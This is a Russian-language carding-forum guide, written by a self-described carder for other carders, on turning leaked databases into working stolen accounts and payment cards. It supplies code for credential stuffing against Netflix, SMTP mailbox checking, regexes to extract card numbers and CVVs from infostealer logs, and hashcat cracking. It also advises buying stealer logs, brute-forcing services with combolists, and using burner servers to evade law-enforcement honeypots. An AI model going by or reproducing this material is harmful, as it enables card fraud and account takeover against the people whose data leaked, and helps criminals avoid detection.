Психология утечек и работы с базами: как из слитых данных выжать максимум

[Good Carder]

От кардера — кардерам. Вы скачали 10-гигабайтную базу с «утекшими паролями» и думаете, что теперь вы властелин мира. Но 99% этих данных — мусор. Устаревшие пароли, невалидные email, давно заблокированные карты. Ключ к успеху — не в объёме, а в умении фильтровать, верифицировать и извлекать ценную информацию из шума. В 2026 году утечки данных происходят ежедневно, но 90% кардеров не умеют ими пользоваться.

В этой статье я разберу, какие утечки действительно ценны (Fresh, Combolist, Fullz), как парсить многогигабайтные дампы, как верифицировать email и пароли, как извлекать номера карт и CVV из логов, и как не вляпаться в honeypot. Вы научитесь превращать терабайты мусора в сотни рабочих аккаунтов и карт.

Часть 1. Типы утечек: что ценно, а что — шум​

1.1. Combolist (emailassword)​

Самый массовый тип. Обычно представляет собой текстовый файл с миллионами строк emailassword. Источники: сливы форумов, утечки игровых серверов, базы из стилеров. Валидность — 1–5% (из миллиона строк 10–50 тысяч живых). Но даже из живых многие аккаунты не имеют ценности (нет привязанных карт, неактивны).

Что можно сделать:

• Проверить аккаунты на популярных сервисах (Netflix, Spotify, Amazon).
• Использовать для брутфорса других сервисов (многие люди повторяют пароли).
• Продать как «combolist» другим кардерам.

1.2. Fresh (свежие данные)​

Свежие логи из инфостилеров (RedLine, Raccoon, Vidar). Содержат не только пароли, но и cookies, автофиллы (включая данные карт), файлы кошельков, сессионные токены. Самый ценный тип утечек. Цена на даркнете — $50–500 за свежий лог (в зависимости от объёма и качества).

Что можно извлечь:

• Номера карт, CVV, сроки, биллинг.
• Сессионные cookie (можно войти в аккаунт без пароля).
• Пароли от криптокошельков.
• Данные для входа в банки и платёжные системы.

1.3. Fullz (полный пакет данных)​

Имя, адрес, SSN (для США), дата рождения, номер карты, CVV. Это уже готовые «карты с биллингом». Цена — $30–80 за штуку. Такие базы редко попадают в открытый доступ — они продаются на даркнете.

1.4. Дампы баз данных (SQL)​

Утечки целых сайтов (форумов, магазинов). Содержат email, хэши паролей, иногда номера карт (в зашифрованном виде). Нужно уметь расшифровывать хэши и парсить структуру.

Часть 2. Инструменты для парсинга утечек​

2.1. Grep и командная строка (быстрая фильтрация)​

Для первичного анализа многогигабайтных файлов используйте grep, cut, sort, uniq.

# Извлечь все строки, содержащие @gmail.com
grep "@gmail.com" big_file.txt > gmail_only.txt

# Извлечь только email и пароль (разделитель :)
cut -d':' -f1,2 big_file.txt > emails_passwords.txt

# Удалить дубликаты email
sort emails.txt | uniq > emails_unique.txt

2.2. Python для сложной обработки​

import re

def extract_emails_and_passwords(filename):
    emails = []
    with open(filename, 'r', errors='ignore') as f:
        for line in f:
            # Проверка формата email:пароль
            match = re.match(r'([^:]+):(.+)', line.strip())
            if match:
                email, password = match.groups()
                if '@' in email and len(password) >= 4:
                    emails.append((email, password))
    return emails

2.3. Специализированные парсеры утечек​

• DeHashed (платный) — поиск по email, username, хэшам в утечках.
• LeakCheck — API для проверки email в базах.
• Hudson Rock — база инфестилер-логов.

Часть 3. Верификация email и паролей (чекер)​

После извлечения пар нужно проверить, какие аккаунты ещё живы.

3.1. SMTP-чекер (проверка валидности email)​

Простой способ: проверить, существует ли почтовый ящик через SMTP-запрос. Но многие почтовые сервисы блокируют такие проверки.

import smtplib
import dns.resolver

def check_email_exists(email):
    domain = email.split('@')[1]
    try:
        mx_records = dns.resolver.resolve(domain, 'MX')
        mx = str(mx_records[0].exchange)
        server = smtplib.SMTP(mx, 25)
        server.helo()
        server.mail('test@example.com')
        code, _ = server.rcpt(email)
        server.quit()
        return code == 250
    except:
        return False

3.2. Брутфорс популярных сервисов (Netflix, Spotify)​

Самый надёжный способ — попробовать войти на целевой сервис с парами emailassword.

import requests

def check_netflix(email, password):
    session = requests.Session()
    login_url = "https://www.netflix.com/login"
    data = {"userLoginId": email, "password": password}
    response = session.post(login_url, data=data)
    return "browse" in response.url

Для масштабирования используйте многопоточность и пул резидентных прокси.

3.3. Проверка через API сервисов (продвинутый)​

Некоторые сервисы имеют открытые API для проверки логина. Например, Discord, Telegram, GitHub. Используйте их.

Часть 4. Извлечение карт и CVV из логов​

Самые ценные данные — номера карт (PAN), сроки, CVV, биллинг. Они часто встречаются в инфестилер-логах.

4.1. Регулярные выражения для поиска карт​

import re

def find_cards(text):
    # Visa, Mastercard, Amex, Discover
    patterns = [
        r'\b(?:4[0-9]{12}(?:[0-9]{3})?)\b',  # Visa
        r'\b(?:5[1-5][0-9]{14})\b',           # Mastercard
        r'\b(?:3[47][0-9]{13})\b',            # Amex
        r'\b(?:6011[0-9]{12})\b'              # Discover
    ]
    cards = []
    for pattern in patterns:
        cards.extend(re.findall(pattern, text))
    return cards

4.2. Поиск CVV и сроков​

CVV обычно идёт рядом с номером карты. Ищите по шаблонам:

• \b\d{3,4}\b (рядом с номером карты)
• exp|expiry|expiration|valid through|valid thru|mm/yy|mm/yyyy

4.3. Автофиллы из браузеров​

Инфестилеры крадут данные автофилла из Chrome/Edge. Они часто хранятся в JSON-файлах. Ищите ключи credit_card, card_number, expiration_date, cvv.

Часть 5. Работа с хэшами паролей​

В старых утечках пароли хранятся в виде хэшей (MD5, SHA-1, bcrypt). Чтобы их использовать, нужно расшифровать.

5.1. Радужные таблицы (Rainbow tables)​

Предварительно вычисленные таблицы для обратного хэширования. Инструменты: Ophcrack, RainbowCrack. Для MD5 и SHA-1 работают хорошо, для bcrypt — нет.

5.2. Онлайн-сервисы дешифровки​

• CrackStation — бесплатный для MD5/SHA1.
• CMD5 — платный, но мощный.
• HashCat — локальная программа на GPU, подбирает хэши через словари и брутфорс.

5.3. HashCat пример:​

hashcat -m 0 -a 0 hash.txt rockyou.txt

Где -m 0 = MD5, -a 0 = словарная атака.

Часть 6. Фильтрация данных по качеству​

Из 10 миллионов строк вы получите 100 тысяч валидных аккаунтов. Из них только 5–10 тысяч имеют ценность (активные подписки, привязанные карты). Нужно фильтровать.

Признаки качественного аккаунта:

• Email не из временных сервисов (mailinator, 10minutemail).
• Пароль сложный (не 123456, не qwerty).
• Аккаунт зарегистрирован давно (чем старше, тем больше шансов, что он не заброшен).
• Есть привязанные платёжные методы.

Автоматическая оценка:

def score_account(email, password):
    score = 0
    if len(password) >= 8: score += 10
    if any(c.isdigit() for c in password): score += 5
    if any(c.isupper() for c in password): score += 5
    if any(c in '!@#$%^&*' for c in password): score += 10
    if 'temp' in email or 'mailinator' in email: score -= 50
    if email.endswith('@gmail.com'): score += 20
    return score

Часть 7. Психология утечек: почему люди теряют данные и как этим пользоваться​

Люди — самое слабое звено. Большинство утечек происходит из-за:

• Повтор паролей. Человек использует один пароль для почты, соцсетей и криптобиржи. Слив одного сервиса раскрывает все остальные.
• Фишинг. Жертва сама отдаёт данные на поддельном сайте.
• Стилеры. Вредоносное ПО, которое крадёт сохранённые пароли и куки.

Как использовать:

• Покупайте свежие логи из стилеров (они самые ценные).
• Используйте комбо-листы для брутфорса крупных сервисов.
• Не пренебрегайте «старыми» утечками — многие люди не меняют пароли годами.

Часть 8. Как не вляпаться в honeypot (ловушку)​

Правоохранители иногда выкладывают поддельные утечки с «живыми» данными, которые ведут на их серверы. Если вы скачаете и начнёте использовать такие данные, ваш IP будет залогирован.

Признаки honeypot:

• Утечка слишком «вкусная» (миллионы свежих карт).
• Опубликована анонимно, без ссылок на известные источники.
• Файлы имеют странные названия или метаданные.

Как защититься:

• Скачивайте утечки только с проверенных трекеров (BreachForums, Dread).
• Проверяйте хэши файлов через VirusTotal.
• Используйте свежий VPS для скачивания и обработки, который не жалко сжечь.

Часть 9. Чек-лист работы с утечкой​

• Скачайте дамп с проверенного источника (Torrent, Dread).
• Проверьте тип — combolist, fresh, SQL.
• Извлеките email и пароли (grep, Python).
• Отфильтруйте дубликаты и мусор (временные email, короткие пароли).
• Прогоните через чекер (SMTP или API целевых сервисов).
• Извлеките номера карт и CVV (регулярные выражения).
• Расшифруйте хэши (HashCat, радужные таблицы).
• Оцените качество (скоринг аккаунтов).
• Сохраните ценные данные (аккаунты с подписками, карты).
• Уничтожьте исходный дамп после обработки (очистите диск).

Резюме​

Утечки данных — это не золотая жила для ленивых. Это сырая руда, которую нужно переработать. Из 10 ГБ мусора вы получите 100–500 рабочих аккаунтов или 10–50 карт, если умеете фильтровать и верифицировать. Используйте правильные инструменты (grep, Python, HashCat), проверяйте аккаунты через чекеры, не ведитесь на honeypot. В 2026 году тот, кто умеет работать с утечками, всегда будет при деньгах.

Быстрая памятка на одну строку:
«Combolist — 1% валидности, fresh — 20%. Grep и cut чистят шум. SMTP-чекер отсеивает мёртвые email. HashCat взламывает хэши. Регулярки находят карты и CVV. Скачай, отфильтруй, проверь, расшифруй, сохрани. 10 ГБ мусора = 10 рабочих карт. Утечки — не волшебство, а инженерия»